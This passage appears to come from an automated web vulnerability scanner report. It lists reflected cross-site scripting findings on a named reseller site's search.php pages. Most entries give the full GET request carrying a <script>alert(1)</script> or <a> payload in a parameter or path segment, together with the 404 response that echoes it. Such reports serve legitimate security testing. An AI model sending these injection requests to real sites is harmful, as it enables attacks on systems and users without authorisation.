Date: Wed, 17 Nov 2010 23:25:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php68d48<script>alert(1)</script>8aeae74aaf3?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2869. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1fe81<a>d3c37efa1bb was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search1fe81<a>d3c37efa1bb&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search1fe81<a>d3c37efa1bb&opt=2 was not found on this server.</p>
...[SNIP]...

2.2870. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 2a3cc<a>61201582489 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...2a3cc<a>61201582489&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:21:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...2a3cc<a>61201582489&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2871. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2436c<script>alert(1)</script>d431ce73f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2436c<script>alert(1)</script>d431ce73f09=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&2436c<script>alert(1)</script>d431ce73f09=1 was not found on this server.</p>
...[SNIP]...

2.2872. http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload cf3fd<a>a25ea90742 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cf3fd<a>a25ea90742 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2cf3fd<a>a25ea90742 was not found on this server.</p>
...[SNIP]...

2.2873. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 72a89<script>alert(1)</script>ca37edad059 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail72a89<script>alert(1)</script>ca37edad059/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail72a89<script>alert(1)</script>ca37edad059/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2874. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload edde0<script>alert(1)</script>d9adcbe4d9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40edde0<script>alert(1)</script>d9adcbe4d9e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40edde0<script>alert(1)</script>d9adcbe4d9e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2875. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70bc3<script>alert(1)</script>3483c25f9ae was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes70bc3<script>alert(1)</script>3483c25f9ae/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes70bc3<script>alert(1)</script>3483c25f9ae/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2876. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea0f0<script>alert(1)</script>f502f0d6a38 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmosea0f0<script>alert(1)</script>f502f0d6a38/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmosea0f0<script>alert(1)</script>f502f0d6a38/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2877. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload d25b7<script>alert(1)</script>1848360ea14 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/imagesd25b7<script>alert(1)</script>1848360ea14/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/imagesd25b7<script>alert(1)</script>1848360ea14/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2878. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 21c24<script>alert(1)</script>f049405c926 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/search.php21c24<script>alert(1)</script>f049405c926?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:25:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php21c24<script>alert(1)</script>f049405c926?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2879. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ae69b<a>3caffd94708 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchae69b<a>3caffd94708&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Searchae69b<a>3caffd94708&opt=2 was not found on this server.</p>
...[SNIP]...

2.2880. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload f494a<a>05e180a3ff0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...f494a<a>05e180a3ff0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...f494a<a>05e180a3ff0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2881. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 6cd21<script>alert(1)</script>4d619f124ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6cd21<script>alert(1)</script>4d619f124ff=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&6cd21<script>alert(1)</script>4d619f124ff=1 was not found on this server.</p>
...[SNIP]...

2.2882. http://www.resellerbase.com/detail/40/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e09ed<a>db53bd9fb5f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2e09ed<a>db53bd9fb5f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2e09ed<a>db53bd9fb5f was not found on this server.</p>
...[SNIP]...

2.2883. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1e52d<script>alert(1)</script>13cd46fea40 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1e52d<script>alert(1)</script>13cd46fea40/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1e52d<script>alert(1)</script>13cd46fea40/40/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2884. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 52ad6<script>alert(1)</script>ab94bf680a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4052ad6<script>alert(1)</script>ab94bf680a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4052ad6<script>alert(1)</script>ab94bf680a/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2885. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bfb12<script>alert(1)</script>c13ea45d330 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themesbfb12<script>alert(1)</script>c13ea45d330/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:24:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themesbfb12<script>alert(1)</script>c13ea45d330/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2886. http://www.resellerbase.com/detail/40/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/40/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ae5cd<script>alert(1)</script>c8ed0be7cff was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

